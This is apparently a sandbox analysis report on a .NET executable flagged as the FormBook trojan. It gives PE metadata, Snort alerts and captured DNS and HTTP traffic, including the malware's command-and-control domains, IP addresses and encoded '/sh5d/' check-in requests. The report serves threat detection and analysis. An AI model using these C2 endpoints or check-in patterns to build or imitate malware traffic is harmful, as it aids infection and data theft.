                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            Name | Virtual Address | Virtual Size | Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6e5f0 | 0x4f | .text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x70000 | 0x5fc | .rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0xc | .reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                            Sections

                                            Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                            .text | 0x2000 | 0x6c658 | 0x6c800 | False | 0.883170272897 | data | 7.85414523612 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc | 0x70000 | 0x5fc | 0x600 | False | 0.436848958333 | data | 4.2146833829 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc | 0x72000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            Name | RVA | Size | Type | Language | Country
                                            RT_VERSION | 0x70090 | 0x36c | data | |
                                            RT_MANIFEST | 0x7040c | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                            Imports

                                            DLL | Import
                                            mscoree.dll | _CorExeMain

                                            Version Infos

                                            Description | Data
                                            Translation | 0x0000 0x04b0
                                            LegalCopyright | Copyright Rogers Peet
                                            Assembly Version | 8.0.6.0
                                            InternalName | ReturnValueNameAttribu.exe
                                            FileVersion | 5.6.0.0
                                            CompanyName | Rogers Peet
                                            LegalTrademarks |
                                            Comments |
                                            ProductName | Biblan
                                            ProductVersion | 5.6.0.0
                                            FileDescription | Biblan
                                            OriginalFilename | ReturnValueNameAttribu.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                            11/25/21-15:09:09.126288 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49766 | 34.102.136.180 | 192.168.2.3
                                            11/25/21-15:09:14.229963 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49786 | 80 | 192.168.2.3 | 34.102.136.180
                                            11/25/21-15:09:14.229963 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49786 | 80 | 192.168.2.3 | 34.102.136.180
                                            11/25/21-15:09:14.229963 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49786 | 80 | 192.168.2.3 | 34.102.136.180
                                            11/25/21-15:09:14.348176 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49786 | 34.102.136.180 | 192.168.2.3
                                            11/25/21-15:09:19.479118 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49792 | 80 | 192.168.2.3 | 142.250.203.115
                                            11/25/21-15:09:19.479118 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49792 | 80 | 192.168.2.3 | 142.250.203.115
                                            11/25/21-15:09:19.479118 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49792 | 80 | 192.168.2.3 | 142.250.203.115
                                            11/25/21-15:09:36.061017 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49812 | 34.102.136.180 | 192.168.2.3
                                            11/25/21-15:09:45.250397 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.2.3 | 8.8.8.8
                                            11/25/21-15:10:15.460524 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49821 | 34.102.136.180 | 192.168.2.3

                                            Network Port Distribution

                                            TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2021 15:09:08.920068026 CET | 49766 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:08.943620920 CET | 80 | 49766 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:08.945020914 CET | 49766 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:08.945138931 CET | 49766 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:08.966568947 CET | 80 | 49766 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:09.126287937 CET | 80 | 49766 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:09.126313925 CET | 80 | 49766 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:09.126471043 CET | 49766 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:09.126518011 CET | 49766 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:09.148281097 CET | 80 | 49766 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:14.207575083 CET | 49786 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:14.229716063 CET | 80 | 49786 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:14.229899883 CET | 49786 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:14.229963064 CET | 49786 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:14.251589060 CET | 80 | 49786 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:14.348176003 CET | 80 | 49786 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:14.348242998 CET | 80 | 49786 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:14.348376989 CET | 49786 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:14.348406076 CET | 49786 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:14.657246113 CET | 49786 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:14.678802013 CET | 80 | 49786 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:19.462028980 CET | 49792 | 80 | 192.168.2.3 | 142.250.203.115
Nov 25, 2021 15:09:19.478698969 CET | 80 | 49792 | 142.250.203.115 | 192.168.2.3
Nov 25, 2021 15:09:19.478837967 CET | 49792 | 80 | 192.168.2.3 | 142.250.203.115
Nov 25, 2021 15:09:19.479118109 CET | 49792 | 80 | 192.168.2.3 | 142.250.203.115
Nov 25, 2021 15:09:19.495594025 CET | 80 | 49792 | 142.250.203.115 | 192.168.2.3
Nov 25, 2021 15:09:19.985984087 CET | 49792 | 80 | 192.168.2.3 | 142.250.203.115
Nov 25, 2021 15:09:20.007325888 CET | 80 | 49792 | 142.250.203.115 | 192.168.2.3
Nov 25, 2021 15:09:20.481894016 CET | 80 | 49792 | 142.250.203.115 | 192.168.2.3
Nov 25, 2021 15:09:20.482101917 CET | 49792 | 80 | 192.168.2.3 | 142.250.203.115
Nov 25, 2021 15:09:20.482167959 CET | 80 | 49792 | 142.250.203.115 | 192.168.2.3
Nov 25, 2021 15:09:20.482223034 CET | 49792 | 80 | 192.168.2.3 | 142.250.203.115
Nov 25, 2021 15:09:20.482312918 CET | 80 | 49792 | 142.250.203.115 | 192.168.2.3
Nov 25, 2021 15:09:20.482362986 CET | 49792 | 80 | 192.168.2.3 | 142.250.203.115
Nov 25, 2021 15:09:30.374047041 CET | 49794 | 80 | 192.168.2.3 | 103.224.212.219
Nov 25, 2021 15:09:30.601291895 CET | 80 | 49794 | 103.224.212.219 | 192.168.2.3
Nov 25, 2021 15:09:30.601430893 CET | 49794 | 80 | 192.168.2.3 | 103.224.212.219
Nov 25, 2021 15:09:30.601727009 CET | 49794 | 80 | 192.168.2.3 | 103.224.212.219
Nov 25, 2021 15:09:30.842940092 CET | 80 | 49794 | 103.224.212.219 | 192.168.2.3
Nov 25, 2021 15:09:30.842967987 CET | 80 | 49794 | 103.224.212.219 | 192.168.2.3
Nov 25, 2021 15:09:30.843144894 CET | 49794 | 80 | 192.168.2.3 | 103.224.212.219
Nov 25, 2021 15:09:30.843224049 CET | 49794 | 80 | 192.168.2.3 | 103.224.212.219
Nov 25, 2021 15:09:31.060944080 CET | 80 | 49794 | 103.224.212.219 | 192.168.2.3
Nov 25, 2021 15:09:35.920053005 CET | 49812 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:35.941535950 CET | 80 | 49812 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:35.941663027 CET | 49812 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:35.941904068 CET | 49812 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:35.963869095 CET | 80 | 49812 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:36.061017036 CET | 80 | 49812 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:36.061126947 CET | 80 | 49812 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:36.061269045 CET | 49812 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:36.061312914 CET | 49812 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:36.362240076 CET | 49812 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:09:36.383713007 CET | 80 | 49812 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:09:43.265239000 CET | 49819 | 80 | 192.168.2.3 | 52.204.216.132
Nov 25, 2021 15:09:46.254756927 CET | 49819 | 80 | 192.168.2.3 | 52.204.216.132
Nov 25, 2021 15:09:52.269841909 CET | 49819 | 80 | 192.168.2.3 | 52.204.216.132
Nov 25, 2021 15:10:05.702598095 CET | 49820 | 80 | 192.168.2.3 | 52.204.216.132
Nov 25, 2021 15:10:08.708707094 CET | 49820 | 80 | 192.168.2.3 | 52.204.216.132
Nov 25, 2021 15:10:14.718280077 CET | 49820 | 80 | 192.168.2.3 | 52.204.216.132
Nov 25, 2021 15:10:15.320949078 CET | 49821 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:10:15.340595007 CET | 80 | 49821 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:10:15.342658043 CET | 49821 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:10:15.342689991 CET | 49821 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:10:15.362282038 CET | 80 | 49821 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:10:15.460524082 CET | 80 | 49821 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:10:15.460556030 CET | 80 | 49821 | 34.102.136.180 | 192.168.2.3
Nov 25, 2021 15:10:15.460710049 CET | 49821 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:10:15.460736036 CET | 49821 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:10:15.778795958 CET | 49821 | 80 | 192.168.2.3 | 34.102.136.180
Nov 25, 2021 15:10:15.800736904 CET | 80 | 49821 | 34.102.136.180 | 192.168.2.3

                                            UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2021 15:09:08.834608078 CET | 49559 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:09:08.901595116 CET | 53 | 49559 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:09:14.145761967 CET | 52650 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:09:14.206563950 CET | 53 | 52650 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:09:19.383676052 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:09:19.459450960 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:09:25.058619976 CET | 53615 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:09:25.097635031 CET | 53 | 53615 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:09:30.115839005 CET | 50728 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:09:30.372935057 CET | 53 | 50728 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:09:35.863133907 CET | 53777 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:09:35.918409109 CET | 53 | 53777 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:09:41.107296944 CET | 57106 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:09:42.128709078 CET | 57106 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:09:43.175431967 CET | 57106 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:09:43.262866020 CET | 53 | 57106 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:09:45.250235081 CET | 53 | 57106 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:09:45.317536116 CET | 53 | 57106 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:10:05.613094091 CET | 60352 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:10:05.650708914 CET | 53 | 60352 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:10:09.370842934 CET | 56773 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:10:10.272214890 CET | 53 | 56773 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:10:15.279592037 CET | 60982 | 53 | 192.168.2.3 | 8.8.8.8
Nov 25, 2021 15:10:15.319477081 CET | 53 | 60982 | 8.8.8.8 | 192.168.2.3
Nov 25, 2021 15:10:20.474148035 CET | 58058 | 53 | 192.168.2.3 | 8.8.8.8

                                            ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Nov 25, 2021 15:09:45.250396967 CET | 192.168.2.3 | 8.8.8.8 | d05e | (Port unreachable) | Destination Unreachable

                                            DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Nov 25, 2021 15:09:08.834608078 CET | 192.168.2.3 | 8.8.8.8 | 0x23a1 | Standard query (0) | www.platinumcredit.net | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:14.145761967 CET | 192.168.2.3 | 8.8.8.8 | 0x8897 | Standard query (0) | www.151motors.com | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:19.383676052 CET | 192.168.2.3 | 8.8.8.8 | 0x93b8 | Standard query (0) | www.suepersoldiers.com | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:25.058619976 CET | 192.168.2.3 | 8.8.8.8 | 0xe941 | Standard query (0) | www.thefullfledged.com | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:30.115839005 CET | 192.168.2.3 | 8.8.8.8 | 0xd6b | Standard query (0) | www.arsels.info | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:35.863133907 CET | 192.168.2.3 | 8.8.8.8 | 0xf03e | Standard query (0) | www.electricatrick.com | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:41.107296944 CET | 192.168.2.3 | 8.8.8.8 | 0xbdc7 | Standard query (0) | www.jakital.com | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:42.128709078 CET | 192.168.2.3 | 8.8.8.8 | 0xbdc7 | Standard query (0) | www.jakital.com | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:43.175431967 CET | 192.168.2.3 | 8.8.8.8 | 0xbdc7 | Standard query (0) | www.jakital.com | A (IP address) | IN (0x0001)
Nov 25, 2021 15:10:05.613094091 CET | 192.168.2.3 | 8.8.8.8 | 0x6d29 | Standard query (0) | www.jakital.com | A (IP address) | IN (0x0001)
Nov 25, 2021 15:10:09.370842934 CET | 192.168.2.3 | 8.8.8.8 | 0xa6f8 | Standard query (0) | www.xcgtsret.com | A (IP address) | IN (0x0001)
Nov 25, 2021 15:10:15.279592037 CET | 192.168.2.3 | 8.8.8.8 | 0xf205 | Standard query (0) | www.vupeliquid.com | A (IP address) | IN (0x0001)
Nov 25, 2021 15:10:20.474148035 CET | 192.168.2.3 | 8.8.8.8 | 0xf7cb | Standard query (0) | www.nbtianzhou.com | A (IP address) | IN (0x0001)

                                            DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Nov 25, 2021 15:09:08.901595116 CET | 8.8.8.8 | 192.168.2.3 | 0x23a1 | No error (0) | www.platinumcredit.net | platinumcredit.net | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 15:09:08.901595116 CET | 8.8.8.8 | 192.168.2.3 | 0x23a1 | No error (0) | platinumcredit.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:14.206563950 CET | 8.8.8.8 | 192.168.2.3 | 0x8897 | No error (0) | www.151motors.com | 151motors.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 15:09:14.206563950 CET | 8.8.8.8 | 192.168.2.3 | 0x8897 | No error (0) | 151motors.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:19.459450960 CET | 8.8.8.8 | 192.168.2.3 | 0x93b8 | No error (0) | www.suepersoldiers.com | ghs.googlehosted.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 15:09:19.459450960 CET | 8.8.8.8 | 192.168.2.3 | 0x93b8 | No error (0) | ghs.googlehosted.com | | 142.250.203.115 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:25.097635031 CET | 8.8.8.8 | 192.168.2.3 | 0xe941 | Name error (3) | www.thefullfledged.com | none | none | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:30.372935057 CET | 8.8.8.8 | 192.168.2.3 | 0xd6b | No error (0) | www.arsels.info | | 103.224.212.219 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:35.918409109 CET | 8.8.8.8 | 192.168.2.3 | 0xf03e | No error (0) | www.electricatrick.com | electricatrick.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 15:09:35.918409109 CET | 8.8.8.8 | 192.168.2.3 | 0xf03e | No error (0) | electricatrick.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:43.262866020 CET | 8.8.8.8 | 192.168.2.3 | 0xbdc7 | No error (0) | www.jakital.com | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 15:09:43.262866020 CET | 8.8.8.8 | 192.168.2.3 | 0xbdc7 | No error (0) | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | 52.204.216.132 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:43.262866020 CET | 8.8.8.8 | 192.168.2.3 | 0xbdc7 | No error (0) | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | 54.164.248.48 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:45.250235081 CET | 8.8.8.8 | 192.168.2.3 | 0xbdc7 | No error (0) | www.jakital.com | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 15:09:45.250235081 CET | 8.8.8.8 | 192.168.2.3 | 0xbdc7 | No error (0) | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | 52.204.216.132 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:45.250235081 CET | 8.8.8.8 | 192.168.2.3 | 0xbdc7 | No error (0) | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | 54.164.248.48 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:45.317536116 CET | 8.8.8.8 | 192.168.2.3 | 0xbdc7 | No error (0) | www.jakital.com | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 15:09:45.317536116 CET | 8.8.8.8 | 192.168.2.3 | 0xbdc7 | No error (0) | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | 52.204.216.132 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:09:45.317536116 CET | 8.8.8.8 | 192.168.2.3 | 0xbdc7 | No error (0) | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | 54.164.248.48 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:10:05.650708914 CET | 8.8.8.8 | 192.168.2.3 | 0x6d29 | No error (0) | www.jakital.com | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 15:10:05.650708914 CET | 8.8.8.8 | 192.168.2.3 | 0x6d29 | No error (0) | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | 52.204.216.132 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:10:05.650708914 CET | 8.8.8.8 | 192.168.2.3 | 0x6d29 | No error (0) | AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com | | 54.164.248.48 | A (IP address) | IN (0x0001)
Nov 25, 2021 15:10:10.272214890 CET | 8.8.8.8 | 192.168.2.3 | 0xa6f8 | Server failure (2) | www.xcgtsret.com | none | none | A (IP address) | IN (0x0001)
Nov 25, 2021 15:10:15.319477081 CET | 8.8.8.8 | 192.168.2.3 | 0xf205 | No error (0) | www.vupeliquid.com | vupeliquid.com | | CNAME (Canonical name) | IN (0x0001)
Nov 25, 2021 15:10:15.319477081 CET | 8.8.8.8 | 192.168.2.3 | 0xf205 | No error (0) | vupeliquid.com | | 34.102.136.180 | A (IP address) | IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • www.platinumcredit.net
                                            • www.151motors.com
                                            • www.suepersoldiers.com
                                            • www.arsels.info
                                            • www.electricatrick.com
                                            • www.vupeliquid.com

                                            HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49766 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 15:09:08.945138931 CET | 1731 | OUT | GET /sh5d/?Yv=hy4EQ9RQ8H0Qmf+V5oZYawTzVdNi6YgEsN2g+zlr8kWBt8RwCZI+yMGy7WuYiu2G3qgy&8pZ=MFQX HTTP/1.1
                                            Host: www.platinumcredit.net
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
Nov 25, 2021 15:09:09.126287937 CET | 1734 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:09:09 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "618be73d-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49786 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 15:09:14.229963064 CET | 1779 | OUT | GET /sh5d/?Yv=KHnqZ0TbjHhhriSsr4IC2tQHFpsEpNX6XKtcehIZDPMVzpPTFiaMMZSG67rbMC0Gdpxx&8pZ=MFQX HTTP/1.1
                                            Host: www.151motors.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
Nov 25, 2021 15:09:14.348176003 CET | 1780 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Thu, 25 Nov 2021 14:09:14 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "618be75c-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49792 | 142.250.203.115 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Nov 25, 2021 15:09:19.479118109 CET | 6789 | OUT | GET /sh5d/?Yv=SDhgbwSt5mB4DODrBIecU0Cn9nI1MHSsH0Hazkrlv9wpSquk3LdmspAinMLs2LJY3gHa&8pZ=MFQX HTTP/1.1
                                            Host: www.suepersoldiers.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
Nov 25, 2021 15:09:20.481894016 CET | 6790 | IN | HTTP/1.1 200 OK
                                            Date: Thu, 25 Nov 2021 14:09:20 GMT
                                            Expires: Thu, 25 Nov 2021 14:19:20 GMT
                                            Cache-Control: public, max-age=600
                                            ETag: "QUrYJA"
                                            X-Cloud-Trace-Context: e9bf4e2176d1e4f430f08354d7ed8296
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Server: Google Frontend
                                            Connection: close
